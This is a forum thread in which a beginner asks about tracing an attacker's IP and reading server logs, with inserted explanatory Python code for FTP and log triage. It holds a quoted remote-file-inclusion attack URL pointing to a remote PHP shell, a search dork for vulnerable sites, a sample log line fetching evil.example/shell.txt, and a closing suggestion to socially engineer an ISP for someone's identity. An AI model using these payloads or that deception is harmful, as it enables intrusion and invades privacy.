IP question

For beginners, flames not allowed...(just by the staff :P)
Still_Learning
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
Location: Trigger City

IP question

Post by Still_Learning »

Is it possible to find out the person's name / address or phone number if you have their IP?

I had my first hacking attempt on my FTP server :roll:
lol I'm guessing it was done through a proxy, but how can you tell if it is through a proxy, or trace the original IP that used the proxy, and find out the person's name / phone number / address etc.? I did a whois and this is the only info I found

------------------------------------------

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

ReferralServer: whois://whois.apnic.net

NetRange: 124.0.0.0 - 124.255.255.255
CIDR: 124.0.0.0/8
NetName: APNIC-124
NetHandle: NET-124-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/info/faq/abuse
RegDate: 2005-01-27
Updated: 2005-05-20

OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3188
OrgTechEmail: search-apnic-not-arin@apnic.net

----------------------------

I'm not interested in reporting or calling them or anything, but would like to know how to do it, if it can be done.

Also I had weird things happening on my web server, for example

GET HTTP://SOMEWEIRDSITE.COM/PRX1.PHP?HASH=8HSDF8JHFDBLAH

Does that mean someone is trying to use my HTTP server as a proxy? Or trying to hack it, or what? I would like to understand the system's logs better, thanks

G-Brain
Fame ! Where are the chicks?!
Posts: 467
Joined: 08 Nov 2007, 17:00
Location: NL

Re: IP question

Post by G-Brain »

itzm3 wrote: Is it possible to find out the person's name / address or phone number if you have their IP?
Only if you work for their ISP, or can do magic tricks.
I <3 MariaLara more than all of you

ayu
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00

Post by ayu »

Well, the only one who has the address and other personal info about the IP is the ISP of the IP address. And to know if it's a proxy or not, I guess you could port scan it and see if it can be used as a proxy or not =/

Dunno about the HTTP entry in your log, but it might have been a vulnerability scanner or something like that, trying to get access.
"The best place to hide a tree, is in a forest"

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

I guess the attack was multiple login attempts, right? Forget it; if you want to kick everyone's ass trying such stuff you will need 3 employees for that... if you run phpMyAdmin under the default directory (http://mysite/phpmyadmin/) expect loads of such attempts too, same when you run SSH on the default port. I wouldn't even label such stuff as real attacks, it's just the usual "background noise" on the net.
In most cases such login attempts are done by bots on compromised systems, so if you really feel the urge to complain somewhere, do it via the abuse@ address of the network host.

Strong passwords are the key: don't use real words, use generated ones like 6eZt6$ss.... A good practice is also to run SSH on a different port (30000+ or so) and, when using phpMyAdmin, to set a different alias in the Apache config.
If you want to do something more active against too many failed login attempts, take a look at fail2ban:
http://www.fail2ban.org/wiki/index.php/Main_Page

Still_Learning
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
Location: Trigger City

Post by Still_Learning »

Hmm.. see, the thing is I'm not using Apache or such, everything is hardcoded almost.

What would you suggest is the cause or reason for using the GET command to pull info or a link from what looks like a proxy server? A malicious bot / program already on my PC that is trying to access them from my PC? But now I am seeing it for the first time since I have an HTTP server and logging set up?

I do not run phpMyAdmin.. have a hardcoded database.

So I guess there is no way to find out who the person is (don't plan on travelling to Australia to kick anyone's ass in the first place) :lol: but it was just something I wanted to know more about. I don't believe SSH is set up on my system; I have it running off my Linux box, not the Windows one, since I have more experience with Windows. I just ordered O'Reilly's UNIX Power Tools book so maybe I will switch the server to FreeBSD or *nix in the future, but I want to learn how to use it better.

nmap shows this for open ports
PORT STATE SERVICE
20/tcp filtered ftp-data
21/tcp open ftp
80/tcp open http
6667/tcp open irc
8080/tcp open http-proxy

Not sure what the http-proxy port and ftp-data port are open for.. any ideas?
Could the http-proxy open port be something to do with the GET commands referencing proxy links?

Password is very secure =)
Also change the admin name to something other than admin or administrator, which seems to be how they were trying to log in; something very random just like the password, since not too many people will think to use 29jd893JH as an admin user name, etc..

I read about fail2ban in a Linux magazine but don't believe it will work with a Windows OS being the server.

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

Well, running a Windows server is...um..sub-optimal....^^
You have way better possibilities to secure a Linux server and you also have much more opportunities to learn how things work....so I recommend switching as soon as possible; best set up a Linux home server first where you can gain some experience.

Depending on the mode, FTP can use 2 ports: 20 and 21...one for the actual file transfer and the other for the commands like LIST to show the directory...and port 8080 doesn't necessarily have to be a public HTTP proxy; port 8080 is not an assigned one so it can be used for pretty much anything, it is just a usual port for this purpose. I guess you are using an AV/firewall application; they often use port 8080 as a local proxy so the loaded websites can be checked while being loaded. To check what program runs behind the port get TCPView from the downloads.... :wink:
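The two-port behaviour described above, as an added example that is not code from the original post: Python helpers that build and parse the PORT and PASV exchange and record who opens the data connection in each mode. The addresses used are made-up documentation addresses. It goes one step beyond the post by including the check a server should make on an incoming PORT command, the classic defence against the FTP bounce attack (using the server to open data connections to third parties).

```python
import re

PORT_RE = re.compile(r"^PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$")
PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def _hostport(groups):
    """Decode the h1,h2,h3,h4,p1,p2 form both PORT and PASV use."""
    a, b, c, d, p1, p2 = map(int, groups)
    if max(a, b, c, d, p1, p2) > 255:
        raise ValueError("octet out of range")
    return f"{a}.{b}.{c}.{d}", p1 * 256 + p2


def port_command(ip, port):
    """Active mode: the client announces where it is listening; the server
    will then connect OUT to that address, from its own port 20."""
    octets = [int(x) for x in ip.split(".")]
    if len(octets) != 4 or not 0 <= port <= 65535:
        raise ValueError("bad address")
    return "PORT {},{},{},{},{},{}".format(*octets, port // 256, port % 256)


def parse_pasv(reply):
    """Passive mode: the server answers PASV with a 227 reply carrying the
    (ip, port) the client must connect to for the data channel."""
    m = PASV_RE.match(reply)
    if not m:
        raise ValueError("not a 227 reply")
    return _hostport(m.groups())


def parse_port(cmdline, control_peer_ip):
    """Server-side validation of a PORT command. Refusing a host other than
    the control-connection peer, and privileged ports, stops the server from
    being used as a relay to scan or connect to third parties (FTP bounce)."""
    m = PORT_RE.match(cmdline)
    if not m:
        raise ValueError("malformed PORT")
    host, port = _hostport(m.groups())
    if host != control_peer_ip:
        raise ValueError("PORT host differs from control peer (bounce attempt)")
    if port < 1024:
        raise ValueError("refusing data connection to a privileged port")
    return host, port


def port_allowed(cmdline, control_peer_ip):
    """Boolean wrapper around parse_port for policy checks."""
    try:
        parse_port(cmdline, control_peer_ip)
        return True
    except ValueError:
        return False


def data_channel(mode, client, server):
    """Who dials whom for the data connection. `client` and `server` are
    (ip, data_port) pairs. Active: the server connects from port 20 to the
    client's PORT address, so nothing ever listens on the server's port 20
    and a scan shows it closed (or filtered behind a firewall). Passive: the
    client connects to the server's PASV port, which is why clients behind
    NAT or a personal firewall usually need passive mode."""
    if mode == "active":
        return {"initiator": "server", "src": (server[0], 20), "dst": client}
    if mode == "passive":
        return {"initiator": "client", "src": client, "dst": server}
    raise ValueError("mode must be 'active' or 'passive'")


if __name__ == "__main__":
    print(port_command("192.0.2.10", 49152))
    print(parse_pasv("227 Entering Passive Mode (203,0,113,9,195,89)."))
    print(port_allowed("PORT 198,51,100,7,0,25", "192.0.2.10"))  # bounce attempt
    print(data_channel("active", ("192.0.2.10", 49152), ("203.0.113.9", 21)))
```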

n3rd
Staff Member
Posts: 1474
Joined: 15 Nov 2005, 17:00
Location: my own perfect world in ma head :)

Post by n3rd »

bad_brain wrote: I wouldn't even label such stuff as real attacks, it's just the usual "background noise" on the net.
Then how does background noise come into existence on the internet?
Rather odd that it exists.

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

Hehe, what I meant is that these are everyday attacks....they are not directly against your computer; such attacks are done by bots scanning whole IP ranges, and whenever they find /phpmyadmin or port 22 active, for example, they start their login attempts using a wordlist.
About 300 attack attempts a day (mostly RFIs) against suck-o are normal, sometimes even 2000 (the record for the last months was more than 11000, caused by a smartass using a poopy vulnerability scanner)....there is nothing you can do about it, but as long as your system is well secured it's also nothing to worry about; like I said: it's the normal internet background noise. At the beginning you might get worried about it, but with more experience you can separate the background noise from the single-minded attacks.... :wink:

Still_Learning
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
Location: Trigger City

Post by Still_Learning »

I would love to set up a Linux server, that is probably my next project, but I need to learn how to use Linux better first. I have been using Windows since DOS was an OS without any GUI, before Windows 95, etc.. I used Unix systems previously in that same time period, but over the years I always used Windows and am more familiar with its inner workings and system config files and such than with Linux. I just started using Linux like a couple of months ago =) so a Windows server (for me at least) would probably be more secure until I learn *nix command line stuff better and how to configure all the system files properly, encounter every type of error, etc..

What you said, "mostly RFIs", what is that? I believe you are correct B-B, it most likely was a bot because it only did about 15 login attempts, used a bunch of default PWs and such like Admin/Password, Administrator/pass, guest/guest, administrator/qwerty, and one weird one.. admin/asshole? huh? lol. Then it seems they gave up or the bot just kept on moving to an easier target.

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

Post by bad_brain »

I guess the bot simply had a limited amount of user/pass combinations in its wordlist, most likely all default passwords (um, well, except the asshole one :lol: ).

:wink:
Last edited by bad_brain on 19 Sep 2008, 09:51, edited 1 time in total.

DNR
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
Location: Michigan USA

RFI and search engine hacking

Post by DNR »

RFI= remote file inclusion:
http://en.wikipedia.org/wiki/Remote_File_Inclusion

Btw, this was a nice slant on RFI hacking with search engines:
Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of “Google hacking”, although that is how most of the sites vulnerable to RFI attacks are found).

By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.

PoC -
A malicious web page is constructed by an attacker, containing a URL built like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.

Example URL:
http://victim-site/RFI-exploit?http://U ... s-code.php

Google will harvest this URL, visit the site using its crawler and index it.
Meaning accessing the target site with the URL it was provided and exploiting it unwittingly for whoever planted it. It’s a feature, not a bug.

This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif

And note, as an example:
http://www.toomuchcookies.net/index.php ... MD.gif?cmd
Which is no longer vulnerable. The %20 seems out of place, but this is how it is shown in the search.

Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?

Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why other attack types can't be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.
http://blogs.securiteam.com/index.php/archives/746
---------

Search Engine Hacking & more
There was a very interesting article posted on the SecuriTeam blog which talks about anonymizing code injection attacks. The approach is quite simple and yet rather ingenious: simply submit to Google the vulnerable application URL with the attack payload passed via the GET parameters. Within a short period of time Googlebot will dutifully try to index the URL, effectively executing the attack. Stefan had also explored this issue on his blog with some examples showing how to ensure more rapid indexing, so you wouldn't have to wait weeks for the exploit to be triggered.

However, everybody seemed to have focused on Google, which may be a bit unfair to them since other search engines suffer from the same kind of problems. For example, if we take MSN (Microsoft's search) and run the "inurl:cmd.gif" query that the SecuriTeam folks used to test Google, we find a fair number of results. Which tells us that hackers believe in equal opportunity and use MSN as much as Google to propagate their attacks.

But there are other ways too. For example, an attacker could post an anonymous message on a blog or a forum with an image embedded in it, where the image URL is not an image but rather the URL of a vulnerable site with the payload embedded. Which means that when other people read the message their browsers in most cases will make requests to the given URL, thus triggering the attack. This is hardly new though; this scam has been used for ages to inflate hit counter stats, etc... Another attack vector could be to use an application that retrieves content from a URL automatically, such as the W3C validator, which will instantly make a request to any given URL and moreover return you the resulting HTML, all the while obscuring the actual attacker's IP address.

It would be interesting to know what other sites allow this kind of behaviour, where a user-supplied URL is instantly retrieved, hiding the original user's IP.
http://ilia.ws/archives/144-Search-Engi ... -more.html
------

DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
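Reading the log lines that started the thread (the absolute-URI GET) together with the RFI-through-crawler pattern DNR quotes, as an added example that is not code from the original posts or from the quoted blogs: a Python classifier over constructed access-log lines in Apache/nginx combined format. The hostnames, paths, addresses and the list of crawler User-Agent markers are made up or assumed for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in "combined" format (not from the original
# post); every host, path and address is made up. Line 2 has the same shape
# as the GET line quoted at the top of the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Sep/2008:21:14:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Sep/2008:21:14:04 +0000] "GET HTTP://SOMEWEIRDSITE.EXAMPLE/PRX1.PHP?HASH=8HSDF8JHFDBLAH HTTP/1.1" 404 0 "-" "Mozilla/4.0"
198.51.100.7 - - [18/Sep/2008:21:15:10 +0000] "CONNECT mail.example:25 HTTP/1.1" 405 0 "-" "-"
192.0.2.200 - - [18/Sep/2008:21:16:00 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.9 - - [18/Sep/2008:21:17:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Assumed list of crawler User-Agent markers for the illustration; extend it.
CRAWLER_UA = re.compile(r'Googlebot|msnbot|bingbot|Yahoo! Slurp', re.IGNORECASE)


def classify(line):
    """Describe one request as a dict, or return None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    method, target, ua = m["method"], m["target"], m["ua"]
    if method == "CONNECT" or REMOTE_URL.match(target):
        # Absolute-form request target (or CONNECT): the client asks THIS server
        # to fetch someone else's URL, i.e. it is testing for an open proxy.
        # An origin server should answer 4xx; if it ever returns 200 with the
        # remote content, it is relaying for strangers.
        kind = "proxy-probe"
    else:
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        # A parameter whose value is itself a URL is the signature of a remote
        # file inclusion attempt; the trailing "?" turns whatever suffix the
        # script appends (".php", for instance) into a query string on the
        # attacker's host.
        if any(REMOTE_URL.match(value) for _, value in params):
            kind = "rfi-attempt"
        else:
            kind = "normal"
    return {
        "ip": m["ip"],
        "kind": kind,
        "status": int(m["status"]),
        # When the client is a search-engine crawler, the logged IP belongs to
        # the crawler, not to whoever planted the URL for it to fetch.
        "via_crawler": bool(CRAWLER_UA.search(ua)),
    }


def triage(log_text):
    """Classify every non-empty line; unparseable lines are kept, not dropped."""
    rows = []
    for line in log_text.splitlines():
        if line.strip():
            rows.append(classify(line) or {"ip": None, "kind": "unparsed",
                                           "status": None, "via_crawler": False})
    return rows


def summarize(log_text):
    """Count requests per kind: the overview to look at before single lines."""
    counts = {}
    for row in triage(log_text):
        counts[row["kind"]] = counts.get(row["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
    print(summarize(SAMPLE_LOG))
```

The second sample line is the shape the thread asks about: a full URL in the request line means the client expected a proxy, not a web site, and the sensible response is a 4xx plus no outbound fetch. The fourth line shows the attribution problem from DNR's quotes in miniature: the payload is an RFI attempt, but the address in the log is the crawler's, so whois on it leads to the search engine and not to the attacker.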

cipher24
Newbie
Posts: 4
Joined: 08 Oct 2008, 16:00

Re: IP question

Post by cipher24 »

itzm3 wrote: Is it possible to find out the person's name / address or phone number if you have their IP?
[...]
That a joke? lol.

Not possible unless you can hack their ISP

Lyecdevf
cyber Idi Amin
Posts: 1222
Joined: 16 Mar 2006, 17:00
Location: In between life and death.

Post by Lyecdevf »

I think that the only way you can do that is if you somehow socially engineer the ISP. Maybe if you catch some stupid employee on a Sunday morning and have some really good story...who knows!..eh 8)
We will either find a way, or make one.
- Hannibal
